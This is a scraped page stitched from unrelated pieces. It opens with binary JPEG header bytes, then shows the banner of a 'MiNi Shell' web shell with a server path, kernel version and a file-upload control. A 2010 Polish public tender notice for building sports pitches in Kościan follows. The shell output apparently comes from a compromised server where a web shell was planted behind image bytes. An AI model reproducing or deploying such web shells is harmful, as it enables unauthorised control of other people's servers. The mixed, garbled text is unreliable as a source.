JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100526/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100526/145028-N-2010.html

<p class="kh_header"><b>Kościan: Budowa kompleksu boisk sportowych w ramach programu Moje boisko - Orlik 2012 przy Zespole Szkół nr 3 w Kościanie</b><br>
<b>Numer ogłoszenia: 145028 - 2010; data zamieszczenia: 26.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski Kościan , al. Tadeusza Kościuszki 22/204, 64-000 Kościan, woj. wielkopolskie, tel. 065 512 14 66, faks 065 5122700.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.koscian.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa kompleksu boisk sportowych w ramach programu Moje boisko - Orlik 2012 przy Zespole Szkół nr 3 w Kościanie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest budowa kompleksu boisk sportowych w ramach programu Moje boisko - Orlik 2012 przy Zespole Szkół nr 3 w Kościanie.  
2.	Przedmiot zamówienia obejmuje:
2.1	Budowę boiska do piłki nożnej o wymiarach 30,0 m x 62,0 m o powierzchni 1860 m 2 pole gry 26,0 m x 56,0 m 
- podbudowa przepuszczalna
- nawierzchnia do piłki nożnej - sztuczna trawa
  Nawierzchnia syntetyczna typu sztuczna trawa o właściwościach i technologii układania określonych w dokumentacji projektowej  załącznik nr 3 do ogłoszenia i SST załącznik nr 2 do ogłoszenia
Wariant II wysokość włókna min. 40 mm i mniejsza niż 60  mm na podkładzie z maty elastycznej, jeżeli jest wymagana typ maty, jej grubość oraz wypełnienie trawy syntetycznej zgodnie z badaniem laboratorium np. Labosport
1.	Typ włókna: monofil
2.	Skład chemiczny włókna; polietylen
3.	Ciężar włókna: min. 11.000 Dtex,
4.	Gęstość trawy: min. 97.000 włókien na m2 
- obrzeża betonowe na ławie betonowej oddzielające sąsiednie elementy terenu 
od płyty boiska 
Wszystkie elementy zgodne z właściwościami określonymi w dokumentacji technicznej.
Roboty należy wykonać zgodnie z dokumentacją projektową załącznik nr 3 
do ogłoszenia i SST załącznik nr 2 do ogłoszenia   
- wyposażenie
- bramki aluminiowe mocowane w tulejach				- 2 sztuki
- siatki do bramek                                        				- 2 sztuki
2.2.	Budowę boiska wielofunkcyjnego o wymiarach:
30,0m x 50,0 m o powierzchni 1500m2 pole gry 20,0m x 40,0m, 
I sposób - podbudowa przepuszczalna
Wszystkie elementy  zgodne z  właściwościami określonymi w dokumentacji projektowej załącznik nr 1 do ogłoszenia.
Roboty należy wykonać zgodnie z dokumentacją projektową załącznik 
nr 3 do ogłoszenie i SST załącznik nr 2 do ogłoszenia.  	
1.	nawierzchnia boiska wielofunkcyjnego
Nawierzchnia poliuretanowa o właściwościach i technologii układania określonych w dokumentacji projektowej załącznik nr 3 do ogłoszenia i SST załącznik nr 2 do ogłoszenia 
Technologia typu NATRYSK - na podbudowie przepuszczalnej instaluje się warstwę przepuszczalną dla wody i warstwę stabilizującą typu ET o grubości min. 30 mm.  W przypadku nieprzepuszczalnej podbudowy betonowej, asfaltowej lub asfaltowo-betonowej warstwa ET nie jest wymagana. Następnie warstwę gr. 10-11 mm z granulatu SBR, następnie warstwę natrysku mieszanka granulatu EPDM zmieszana z PU o grubości 2-3mm.
2.	wyposażenie do piłki koszykowej
- obręcz do koszykówki standard i siatka do obręczy		  	- 2 sztuki
- tablica do koszykówki epoksydowa o wym. 105 x 180cm			- 2 sztuki
- mechanizm regulacji wysokości 						- 2 sztuki
- konstrukcja do koszykówki dwusłupowa, montowana w tulejach 	- 2 sztuki
3.	wyposażenie  do piłki siatkowej
- słupki do siatkówki, aluminiowe, 
wielofunkcyjne badminton, tenis, siatkówka				- 2 sztuki
- siatka do siatkówki 								- 1 sztuka
4.	wyposażenie do piłki ręcznej
- bramki aluminiowe mocowane w tulejach					- 2 sztuki
- siatki do bramek                                        					- 2 sztuki
2.3.  Ogrodzenie terenu
Szczegółowe rozwiązania wg dokumentacji projektowej załącznik nr 3 do ogłoszenia oraz SST załącznik nr 2 do ogłoszenia.
2.4.  Oświetlenie terenu 
Oświetlenie obiektu będą stanowiły projektory zamocowane na 8 masztach o wysokości min. 9 m. Szczegółowe rozwiązania wg dokumentacji projektowej załącznik nr 3 do ogłoszenia oraz SST  załącznik nr 2 do ogłoszenia.
2.5.  Chodniki
Ciągi komunikacyjne i powierzchnia przeznaczona pod kontener na odpadki stałe - kostka brukowa gr. min 6 cm, na podbudowie z piasku i kruszywa, zamknięta obrzeżem betonowym. Szczegółowe rozwiązania wg dokumentacji projektowej załącznik nr 3 do ogłoszenia oraz SST  zał. nr 2 do ogłoszenia.
2.6.  Fundamenty pod budynek zaplecza socjalnego 
Fundamenty i roboty związane z ich wykonaniem należy wykonać zgodnie 
z dokumentacją projektową załącznik nr 3 do ogłoszenia i SST załącznik 
nr 2 do ogłoszenia   
Szczegółowy opis elementów przedmiotu zamówienia wymienionych w punktach od 2.1 do 2.6 stanowią załączniki: 
Załącznik nr 1 do ogłoszenia - Specyfikacja techniczna wykonania i odbioru robót budowlanych 
Załącznik nr 2 do ogłoszenia - Szczegółowe Specyfikacje Techniczne wykonania i odbioru robót budowlanych- 
Załącznik nr 3 do ogłoszenia  - Dokumentacja projektowa-
Załącznik nr 4 do ogłoszenia - Przedmiar robót - 
Wymagany okres gwarancji dla elementów przedmiotu zamówienia wymienionych w punktach 2.1 do 2.6:
-	na wykonane roboty  materiały i robociznę wynosi 36 miesięcy od dnia odebrania przez Zamawiającego robót budowlanych i podpisania bez uwag protokołu końcowego.
-	na nawierzchnie syntetyczne oraz granulat użyty do wypełnienia nawierzchni ze sztucznej trawy - 60 miesięcy 

2.7  Zaplecze sanitarno-szatniowego - przebudowa istniejących pomieszczeń
Szczegółowy opis dla budynku sanitarno-szatniowego stanowią załączniki:
Załącznik nr 1 do ogłoszenia - Specyfikacja techniczna wykonania i odbioru robót budowlanych 
Załącznik nr 2 do ogłoszenia - Szczegółowe Specyfikacje Techniczne wykonania i odbioru robót budowlanych- 
Załącznik nr 3 do ogłoszenia  - Dokumentacja projektowa-
Załącznik nr 4 do ogłoszenia - Przedmiar robót - 
Wymagany okres gwarancji na wykonane roboty materiały i robociznę wynosi 60 miesięcy od dnia odebrania przez Zamawiającego robót budowlanych i podpisania bez uwag protokołu końcowego.
4.Wszystkie wskazania z nazwy materiałów występujące w dokumentacji projektowej, należy rozumieć jako określenie wymaganych parametrów technicznych lub standardów jakościowych. Oznacza to, że zgodnie z art. 29 ust.3 ustawy Prawo zamówień publicznych, wskazaniom tym towarzyszą wyrazy lub równoważne.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.21-1.</p>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 84.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Zamawiający wymaga wniesienia wadium w terminie składania wniosków  tj. 08.06.2010 r. do 23.07.2010 r.  godz. 9.00.
2.	Ustala się wadium  w wysokości  35.000,00 zł ( trzydzieści pięć  tysięcy  złotych ).
3.	Wykonawca wnosi wadium w wybranej przez siebie, formie:
a)	pieniądzu, wpłacone przelewem na rachunek bankowy, numer konta Zamawiającego Bank Spółdzielczy w Kościanie73 8666 0004 0103 7426 2000 0005,
bankowych lub poręczeniach spółdzielczej kasy oszczędnościowej-kredytowe, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
b)	gwarancjach bankowych,
c)	gwarancjach ubezpieczeniowych,
d)	poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 Nr 42, poz. 275).
4.	W przypadku wniesienia wadium w formie gwarancji lub poręczeń winny być wystawione na okres od 08. 06. 2010 r. do 23.07.2010 r.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w okresie ostatnich pięciu lat przed upływem terminu złożenia wniosku o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - zrealizowali roboty budowlane polegające na budowie boisk sportowych, w tym: 
co najmniej dwóch boisk piłkarskich z nawierzchnią z trawy syntetycznej i co najmniej dwóch boisk z nawierzchnią poliuretanową,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponowanie przynajmniej 1 osobą posiadającą uprawnienia do kierowania robotami budowlanymi o specjalności: 
-konstrukcyjno-budowlanej,
-instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych,
- instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiada ubezpieczenie  od odpowiedzialności cywilnej w zakresie prowadzenia działalności związanej z przedmiotem zamówienia o wartości nie mniejszej niż 500.000,00 zł.Przy składaniu wniosku przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia Wykonawcy mogą złożyć jedną wspólną polisę potwierdzającą, że wszyscy Wykonawcy są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia o wartości nie mniejszej niż 500 000,00 PLN (słownie: pięćset tysięcy złotych).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">A.	Dokumenty dotyczące nawierzchni poliuretanowej:
1.	Certyfikat lub deklaracja zgodności z normą PN-EN 14877:2008, lub 
aprobata techniczna ITB, lub 
rekomendacja techniczna ITB, lub 
wyniki badań specjalistycznego laboratorium potwierdzające parametry oferowanej nawierzchni np. Labosport, lub dokument równoważny.
2.	Karta techniczna oferowanej nawierzchni, potwierdzona przez jej producenta. 
3.	Atest PZH lub równoważny dla oferowanej nawierzchni.
4.	Autoryzacja producenta nawierzchni poliuretanowej, wystawiona dla wykonawcy na realizowaną inwestycję wraz z potwierdzeniem gwarancji udzielonej przez producenta na tą nawierzchnię.
B. Dokumenty dotyczące systemu nawierzchni z trawy syntetycznej:
1.	Aktualny certyfikat FIFA 1 Star lub FIFA 2 Star dla obiektu wykonanego z oferowanego systemu nawierzchni i raport z badań przeprowadzonych przez laboratorium (Labosport lub ISA-Sport lub Sports Labs Ltd), dotyczący oferowanej nawierzchni, potwierdzający zgodność jej parametrów z FIFA Quality Concept for Football Turf (dostępny na www.FIFA.com
2.	Certyfikat lub deklaracja zgodności z normą PN-EN 15330-1:2008, lub
aprobata techniczna ITB, lub 
rekomendacja techniczna ITB.
3.	Karta techniczna oferowanej nawierzchni, potwierdzona przez jej producenta.
4.	Atest PZH lub równoważny dla oferowanej nawierzchni i wypełnienia.
5.	Autoryzacja producenta trawy syntetycznej, wystawiona dla wykonawcy 
na realizowaną inwestycję wraz z potwierdzeniem gwarancji udzielonej przez producenta na tę nawierzchnię.</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> licytacja elektroniczna.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość wydłużenia terminu realizacji zadania w następujących przypadkach:
1)	przestojów i opóźnień zawinionych przez Zamawiającego, 
2)	nieterminowego przekazania placu budowy,
3)	wystąpienie warunków atmosferycznych uniemożliwiających wykonywanie robót - fakt ten musi mieć odzwierciedlenie w Dzienniku budowy i musi być potwierdzony przez inspektora nadzoru,
4)	 wystąpienia awarii nie zawinionej czynnościami lub nie wynikającej z zaniechania czynności, do których Wykonawca był zobowiązany,
5)	działań osób trzecich lub organów władzy publicznej, które spowodują przerwanie lub czasowe zawieszenie realizacji zamówienia,
6)	wystąpienia okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności.
Zmiana osób wyznaczonych do kierowania robotami wymaga akceptacji zamawiającego. Szczegółowe zapisy znajdują sie w projekcie umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>

<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.4.6) Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:</b> http://licytacje.uzp.gov.pl</p>
<p><b>IV.4.7) Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:</b> http://bip.wokiss.pl/koscianm w menu zamówienia publiczne Urząd Miejski w ogłoszeniu o zamówieniu</p>
<p><b>IV.4.8) Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:</b> 1.	Rejestracja w systemie i identyfikacja wykonawców. Rejestracja jest warunkiem koniecznym do wzięcia udziału w licytacji - Wykonawca obowiązany jest dokonać rejestracji na platformie licytacyjnej zamieszczonej na stronie Urzędu Zamówień Publicznych http:licytacje.uzp.gov.pl  , a wraz z wnioskiem o dopuszczenie do udziału w licytacji (zgodnie ze wzorem wniosku na stronie http:bip.wokiss.plkoscianm ( w menu zamówienia publiczne Urząd Miejski ogłoszenie o zamówieniu) winien przekazać Zamawiającemu informację o swoim LOGINIE. 
W przypadku podania przez Wykonawcę niewłaściwego loginu bądź nie  przekazanie go Zamawiającemu wraz z wnioskiem, Wykonawca zobowiązany jest do jego przekazania najpóźniej jeden dzień przed terminem otwarcia licytacji.
Brak logniu bądź brak poprawnego loginu będzie skutkowało brakiem możliwości wzięcia udziału Wykonawcy w licytacji.
Pomoc w sposobie rejestracji i odpowiedzi na ewentualne problemy znajdują się w Menu na głównej stronie platformy licytacje w zakładce Samouczek. 
2.	Wymagania techniczne urządzeń informatycznych.
Wymagania systemu: komputer klasy PC (lub równoważnej) z systemem operacyjnym Windows lub Linux z dostępem do Internetu, spełniający wymogi techniczne określone przez producentów przeglądarek internetowych Mozilla Firefox w wersji 2.0 i 3.0 Intrnet Explorer w wersji 6.0 i 7.0 
System nie dokonuje odświeżenia automatycznie, dlatego w celu zapewnienia aktualności listy postąpień, niezbędne jest samodzielne odświeżanie ekranu przy użyciu przycisku przeglądarki internetowej..</p>
<p><b>IV.4.9) Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:</b> 1.	Zamawiający  udzieli zamówienia Wykonawcy, który zaoferuje najniższą cenę brutto.
2.	W toku licytacji elektronicznej Wykonawcy składają kolejne korzystniejsze postąpienia. Możliwość złożenia postąpienia istnieje od jej otwarcia do jej zamknięcia.
3.	Oferta złożona w toku licytacji przestaje wiązać, gdy inny Wykonawca złożył ofertę korzystniejszą.
4.	W toku licytacji Wykonawcy proponują rzeczywistą cenę oferty brutto wyrażoną w złotych oraz ewentualnie w groszach; grosze należy oddzielić od złotych kropką.
5.	Cena oferty brutto stanowi łączny koszt wykonania wszystkich prac związanych z realizacją przedmiotu zamówienia. Wynagrodzenie jest  ryczałtowe i obejmuje  wszystkie koszty, jakie Zamawiający poniesie w związku z realizacją robót budowlanych będących przedmiotem zamówienia.
6.	Oferta złożona przez Wykonawcę winna być niższa od oferty najkorzystniejszej co najmniej o kwotę minimalnego postąpienia.
7.	Krok postąpienia (minimalna różnica między kolejnymi ofertami) wynosi nie mniej niż 500.00. zł brutto.
8.	W toku licytacji Zamawiający za pośrednictwem platformy licytacyjnej na bieżąco będzie przekazywał wszystkim wykonawcom informacje o pozycji złożonych przez nich ofert, liczbie wykonawców biorących udział w licytacji elektronicznej, a także o cenach złożonych ofert, z tym że do momentu zamknięcia licytacji nie ujawni informacji umożliwiających identyfikację wykonawców.
9.	Zamawiający udzieli zamówienia Wykonawcy, który zaoferuje najniższą cenę brutto..</p>
<p><b>IV.4.10) Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania:</b><br>
<ul class="kh_indent_1"><li><table><tr><td style="font-size: 10pt;"><b>Licytacja jednoetapowa </b>          </td><td></td><td style="font-size: 10pt;"><b>czas trwania:</b> 2.	Etap zakończy się jeżeli w ciągu 15 minut od złożenia najkorzystniejszego postąpienia, żaden z wykonawców nie złożył korzystniejszego postąpienia lub gdy w okresie 15 minut od otwarcia licytacji nie zostanie złożone żadne postąpienie.</td></tr>
</table></li></ul>

<p><b>IV.4.11) Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej:</b> 08.06.2010 godzina 09:00, miejsce: 1Urząd Miejski Kościana, Al. Kościuszki 22 w kancelarii, pokój 108.</p>
